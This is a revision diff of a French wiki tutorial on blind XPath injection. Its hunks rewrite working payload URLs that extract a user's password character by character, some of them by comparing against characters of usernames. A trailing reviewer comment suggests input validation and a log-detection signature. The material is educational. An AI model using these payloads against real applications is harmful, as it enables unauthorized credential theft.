Ci-dessous, les différences entre deux révisions de la page.
web:injection_blind_xpath [2016/02/04 17:04] arkinar créée |
web:injection_blind_xpath [2016/02/16 16:02] arkinar |
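--- a/web:injection_blind_xpath
+++ b/web:injection_blind_xpath
@@ -57,9 +57,9 @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='a'
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='b'
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='c'
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='d'
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='e'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='a'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='b'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='c'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='d'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='e'
 ...
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='p'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='p'
 </code>
@@ -73,9 +73,9 @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='a'
-http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='b'
-http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='c'
-http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='d'
-http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='e'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='a'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='b'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='c'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='d'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='e'
 ...
-http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='A' <=OK
+http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='A' <=OK
 </code>
@@ -85,9 +85,9 @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='a'
-http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='b'
-http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='c'
-http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='d'
-http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='e'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='a'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='b'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='c'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='d'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='e'
 ...
-http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='S' <=OK
+http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='S' <=OK
 </code>
@@ -97,9 +97,9 @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='a'
-http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='b'
-http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='c'
-http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='d'
-http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='e'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='a'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='b'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='c'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='d'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='e'
 ...
-http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='p'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='p'
 </code>
@@ -122,3 +122,3 @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)=codepoints-to-string(112)
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)=codepoints-to-string(112)
 </code>
@@ -128,3 +128,3 @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='p'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='p'
 </code>
@@ -140,3 +140,3 @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)=substring(user[1]/username,1,1)
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)=substring(//user[1]/username,1,1)
 </code>
@@ -148,6 +148,6 @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)=substring(user[4]/username,3,1) <= p
-http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)=substring(user[1]/username,1,1) <= A
-http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)=substring(user[4]/username,1,1) <= S
-http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)=substring(user[4]/username,1,1) <= S
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)=substring(//user[4]/username,3,1) <= p
+http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)=substring(//user[1]/username,1,1) <= A
+http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)=substring(//user[4]/username,1,1) <= S
+http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)=substring(//user[4]/username,1,1) <= S
 </code>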
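Review bot: Every request in these hunks, before and after the change, works only because the numeric `userid` value reaches the XPath expression unchecked, and the visible blocks neither say so nor name the fix. The rest of the article is outside this diff, so this may be covered elsewhere. After the last `</code>` of the Ligne 148 block I would add a short countermeasure sentence such as `Contre-mesure : vérifier que userid est un entier (par exemple avec ctype_digit) avant de construire la requête XPath.` It is also worth documenting for defenders that this technique produces long runs of near-identical requests whose `userid` contains `substring(` and a single quoted character, which is easy to match in access logs.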